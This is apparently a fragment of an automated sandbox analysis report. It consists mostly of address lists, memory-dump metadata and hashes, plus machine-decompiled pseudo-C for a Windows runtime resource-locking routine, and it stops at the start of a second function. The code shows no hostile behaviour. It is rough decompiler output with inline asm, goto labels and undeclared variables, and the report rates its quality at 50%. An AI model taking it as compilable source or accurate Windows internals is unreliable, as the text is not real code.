                                                                                                                                                                0x00b70b27
                                                                                                                                                                0x00b70b2a
                                                                                                                                                                0x00b70b2d
                                                                                                                                                                0x00b70b30
                                                                                                                                                                0x00b70b33
                                                                                                                                                                0x00b70b36
                                                                                                                                                                0x00b70b39
                                                                                                                                                                0x00b70b3e
                                                                                                                                                                0x00b70c65
                                                                                                                                                                0x00b70c68
                                                                                                                                                                0x00b70c6a
                                                                                                                                                                0x00b70c6f
                                                                                                                                                                0x00b9eb42
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb48
                                                                                                                                                                0x00b9eb48
                                                                                                                                                                0x00b70c75
                                                                                                                                                                0x00b70c7a
                                                                                                                                                                0x00b9eb54
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb5a
                                                                                                                                                                0x00b70c80
                                                                                                                                                                0x00b70c84
                                                                                                                                                                0x00b9eb98
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eba6
                                                                                                                                                                0x00b70cb8
                                                                                                                                                                0x00b70cba
                                                                                                                                                                0x00b70cd3
                                                                                                                                                                0x00b70cda
                                                                                                                                                                0x00b70ce4
                                                                                                                                                                0x00b70ce9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70cec
                                                                                                                                                                0x00b70c8c
                                                                                                                                                                0x00b9eb63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb70
                                                                                                                                                                0x00b9eb75
                                                                                                                                                                0x00b9eb7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb8c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb8c
                                                                                                                                                                0x00b70c96
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70ca2
                                                                                                                                                                0x00b70cac
                                                                                                                                                                0x00b70cb4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b44
                                                                                                                                                                0x00b70b47
                                                                                                                                                                0x00b70b49
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b4f
                                                                                                                                                                0x00b70b50
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b56
                                                                                                                                                                0x00b70b62
                                                                                                                                                                0x00b70b7c
                                                                                                                                                                0x00b70bac
                                                                                                                                                                0x00b70a0f
                                                                                                                                                                0x00b9eaaa
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eac4
                                                                                                                                                                0x00b9eac4
                                                                                                                                                                0x00b70bd0
                                                                                                                                                                0x00b70bd0
                                                                                                                                                                0x00b70bd4
                                                                                                                                                                0x00b70bd9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70bdb
                                                                                                                                                                0x00b70be0
                                                                                                                                                                0x00b9eb0e
                                                                                                                                                                0x00b70a1a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70a1a
                                                                                                                                                                0x00b9eb1a
                                                                                                                                                                0x00b9eb1f
                                                                                                                                                                0x00b9eb27
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb36
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb36
                                                                                                                                                                0x00b70bea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70bf6
                                                                                                                                                                0x00b70c00
                                                                                                                                                                0x00b70c03
                                                                                                                                                                0x00b70c0b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c0b
                                                                                                                                                                0x00b9eaaa
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70a15
                                                                                                                                                                0x00b70bb6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70bc6
                                                                                                                                                                0x00b70bc6
                                                                                                                                                                0x00b70bcb
                                                                                                                                                                0x00b70c15
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c1d
                                                                                                                                                                0x00b70c20
                                                                                                                                                                0x00b70c21
                                                                                                                                                                0x00b70c24
                                                                                                                                                                0x00b70c24
                                                                                                                                                                0x00b70c26
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c26
                                                                                                                                                                0x00b70bcd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70bcd
                                                                                                                                                                0x00b70b89
                                                                                                                                                                0x00b70b89
                                                                                                                                                                0x00b70b90
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b96
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b96
                                                                                                                                                                0x00b70a04
                                                                                                                                                                0x00b70a04
                                                                                                                                                                0x00b70b9a
                                                                                                                                                                0x00b70b9a
                                                                                                                                                                0x00b70b9b
                                                                                                                                                                0x00b70b9f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70ba5
                                                                                                                                                                0x00b70ac7
                                                                                                                                                                0x00b70aca
                                                                                                                                                                0x00b9eacf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eade
                                                                                                                                                                0x00b9eade
                                                                                                                                                                0x00b9eae3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eaf3
                                                                                                                                                                0x00b9eaf6
                                                                                                                                                                0x00b9eaf7
                                                                                                                                                                0x00b9eafe
                                                                                                                                                                0x00b9eb01
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb01
                                                                                                                                                                0x00b9eacf
                                                                                                                                                                0x00b70ad0
                                                                                                                                                                0x00b70ad4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70ada
                                                                                                                                                                0x00b70ae6
                                                                                                                                                                0x00b70c34
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c47
                                                                                                                                                                0x00b70c49
                                                                                                                                                                0x00b70c4a
                                                                                                                                                                0x00b70c4e
                                                                                                                                                                0x00b70c51
                                                                                                                                                                0x00b70c54
                                                                                                                                                                0x00b70c57
                                                                                                                                                                0x00b70c5a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c60
                                                                                                                                                                0x00b70afb
                                                                                                                                                                0x00b70afe
                                                                                                                                                                0x00b70b02
                                                                                                                                                                0x00b70b05
                                                                                                                                                                0x00b70b08
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b08
                                                                                                                                                                0x00b70ae6
                                                                                                                                                                0x00b70b44
                                                                                                                                                                0x00b709f8
                                                                                                                                                                0x00b709f8
                                                                                                                                                                0x00b709f9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eaa0
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID: .$:$:
                                                                                                                                                                • API String ID: 3965848254-2308638275
                                                                                                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction ID: da35f7f8a8a1a3ae8596f3df710b46f6cfb8e3c43f9e11107d28c26d53edab49
                                                                                                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction Fuzzy Hash: EAA18D7192030AEFCF25EF64C8856AEBBF4EB05304F24C5EBD46AA7242D6309A41DB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B70554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                			E00B70554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c101c0;
									_push(_t144);
									_push(0);
									_t51 = E00B2F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00B74FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00B83F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00BB217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B83F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00B73915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c101c0;
												_push(_t138);
												_push(0);
												_t58 = E00B2F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00B74FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00B83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00BB217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00B83F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00B73915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00B55384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00B2F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00B73915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00B2F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00B73915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00B2F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00B73915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00B55329(_t110, _t138);
																_t69 = E00B553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                                0x00b7055a
                                                                                                                                                                0x00b7055d
                                                                                                                                                                0x00b70563
                                                                                                                                                                0x00b70566
                                                                                                                                                                0x00b705d8
                                                                                                                                                                0x00b705e2
                                                                                                                                                                0x00b705e5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b705e7
                                                                                                                                                                0x00b705e7
                                                                                                                                                                0x00b705ea
                                                                                                                                                                0x00b705f3
                                                                                                                                                                0x00b705f3
                                                                                                                                                                0x00b70568
                                                                                                                                                                0x00b70568
                                                                                                                                                                0x00b70568
                                                                                                                                                                0x00b70569
                                                                                                                                                                0x00b70569
                                                                                                                                                                0x00b70569
                                                                                                                                                                0x00b7056b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9217f
                                                                                                                                                                0x00b92183
                                                                                                                                                                0x00b9225b
                                                                                                                                                                0x00b9225f
                                                                                                                                                                0x00b92189
                                                                                                                                                                0x00b9218c
                                                                                                                                                                0x00b9218f
                                                                                                                                                                0x00b92194
                                                                                                                                                                0x00b92199
                                                                                                                                                                0x00b9219d
                                                                                                                                                                0x00b921a0
                                                                                                                                                                0x00b921a2
                                                                                                                                                                0x00b921ce
                                                                                                                                                                0x00b921ce
                                                                                                                                                                0x00b921ce
                                                                                                                                                                0x00b921d0
                                                                                                                                                                0x00b921d6
                                                                                                                                                                0x00b921de
                                                                                                                                                                0x00b921e2
                                                                                                                                                                0x00b921e8
                                                                                                                                                                0x00b921e9
                                                                                                                                                                0x00b921ec
                                                                                                                                                                0x00b921f1
                                                                                                                                                                0x00b921f6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b921f8
                                                                                                                                                                0x00b921fb
                                                                                                                                                                0x00b92206
                                                                                                                                                                0x00b9220b
                                                                                                                                                                0x00b9220c
                                                                                                                                                                0x00b92217
                                                                                                                                                                0x00b92226
                                                                                                                                                                0x00b9222b
                                                                                                                                                                0x00b9222c
                                                                                                                                                                0x00b9222f
                                                                                                                                                                0x00b92232
                                                                                                                                                                0x00b92235
                                                                                                                                                                0x00b92235
                                                                                                                                                                0x00b9223a
                                                                                                                                                                0x00b9223f
                                                                                                                                                                0x00b92241
                                                                                                                                                                0x00b92243
                                                                                                                                                                0x00b92248
                                                                                                                                                                0x00b92248
                                                                                                                                                                0x00b9224d
                                                                                                                                                                0x00b9224f
                                                                                                                                                                0x00b92262
                                                                                                                                                                0x00b92263
                                                                                                                                                                0x00b92268
                                                                                                                                                                0x00b92269
                                                                                                                                                                0x00b92269
                                                                                                                                                                0x00b92269
                                                                                                                                                                0x00b9226d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92276
                                                                                                                                                                0x00b92279
                                                                                                                                                                0x00b9227e
                                                                                                                                                                0x00b92283
                                                                                                                                                                0x00b92287
                                                                                                                                                                0x00b9228a
                                                                                                                                                                0x00b9228d
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922be
                                                                                                                                                                0x00b922c4
                                                                                                                                                                0x00b922cc
                                                                                                                                                                0x00b922d0
                                                                                                                                                                0x00b922d6
                                                                                                                                                                0x00b922d7
                                                                                                                                                                0x00b922da
                                                                                                                                                                0x00b922df
                                                                                                                                                                0x00b922e4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922e6
                                                                                                                                                                0x00b922e9
                                                                                                                                                                0x00b922f4
                                                                                                                                                                0x00b922f9
                                                                                                                                                                0x00b922fa
                                                                                                                                                                0x00b92305
                                                                                                                                                                0x00b92314
                                                                                                                                                                0x00b92319
                                                                                                                                                                0x00b9231a
                                                                                                                                                                0x00b9231d
                                                                                                                                                                0x00b92320
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92328
                                                                                                                                                                0x00b9232d
                                                                                                                                                                0x00b9232f
                                                                                                                                                                0x00b92331
                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b9233b
                                                                                                                                                                0x00b9233d
                                                                                                                                                                0x00b92350
                                                                                                                                                                0x00b92351
                                                                                                                                                                0x00b92356
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b9235b
                                                                                                                                                                0x00b9235d
                                                                                                                                                                0x00b55367
                                                                                                                                                                0x00b5536b
                                                                                                                                                                0x00b55372
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92369
                                                                                                                                                                0x00b9236a
                                                                                                                                                                0x00b9236c
                                                                                                                                                                0x00b92371
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b9237a
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b92385
                                                                                                                                                                0x00b92386
                                                                                                                                                                0x00b92389
                                                                                                                                                                0x00b9238e
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b55378
                                                                                                                                                                0x00b5537c
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92397
                                                                                                                                                                0x00b9239c
                                                                                                                                                                0x00b923a2
                                                                                                                                                                0x00b923a3
                                                                                                                                                                0x00b923a6
                                                                                                                                                                0x00b923ab
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b4
                                                                                                                                                                0x00b923b9
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923bc
                                                                                                                                                                0x00b923bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89153
                                                                                                                                                                0x00b89158
                                                                                                                                                                0x00b8915a
                                                                                                                                                                0x00b8915e
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89171
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00b923c6
                                                                                                                                                                0x00b923ce
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92293
                                                                                                                                                                0x00b92295
                                                                                                                                                                0x00b9229a
                                                                                                                                                                0x00b922a1
                                                                                                                                                                0x00b922a3
                                                                                                                                                                0x00b922a7
                                                                                                                                                                0x00b922a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922ab
                                                                                                                                                                0x00b922ad
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00b922b1
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553cb
                                                                                                                                                                0x00b553ce
                                                                                                                                                                0x00b553d0
                                                                                                                                                                0x00b553d4
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d8
                                                                                                                                                                0x00b553e3
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00b92349
                                                                                                                                                                0x00b9234d
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00b921a4
                                                                                                                                                                0x00b921a4
                                                                                                                                                                0x00b921a6
                                                                                                                                                                0x00b921a8
                                                                                                                                                                0x00b921ac
                                                                                                                                                                0x00b921b6
                                                                                                                                                                0x00b921b8
                                                                                                                                                                0x00b921bc
                                                                                                                                                                0x00b921be
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b921c0
                                                                                                                                                                0x00b921c2
                                                                                                                                                                0x00b921c4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b921c4
                                                                                                                                                                0x00b921c6
                                                                                                                                                                0x00b921c6
                                                                                                                                                                0x00b921c8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b921c8
                                                                                                                                                                0x00b921a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92183
                                                                                                                                                                0x00b7057b
                                                                                                                                                                0x00b7057d
                                                                                                                                                                0x00b70581
                                                                                                                                                                0x00b70583
                                                                                                                                                                0x00b92178
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70589
                                                                                                                                                                0x00b7058f
                                                                                                                                                                0x00b7058f
                                                                                                                                                                0x00b70583
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B92206
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-4236105082
                                                                                                                                                                • Opcode ID: 8319b105dbab7e5f12273fac150a429f1c4512d1c027ea44d0609466e900ba2f
                                                                                                                                                                • Instruction ID: e0572860c9297bc2faabee09bb8c0ff51f6dc8620fc82ceca450347fce00deba
                                                                                                                                                                • Opcode Fuzzy Hash: 8319b105dbab7e5f12273fac150a429f1c4512d1c027ea44d0609466e900ba2f
                                                                                                                                                                • Instruction Fuzzy Hash: 3E51F675B002116FEF14DB18CCC1FA673E9EB94B20F2182E9FD59EB285DA61EC418790
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E00B714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
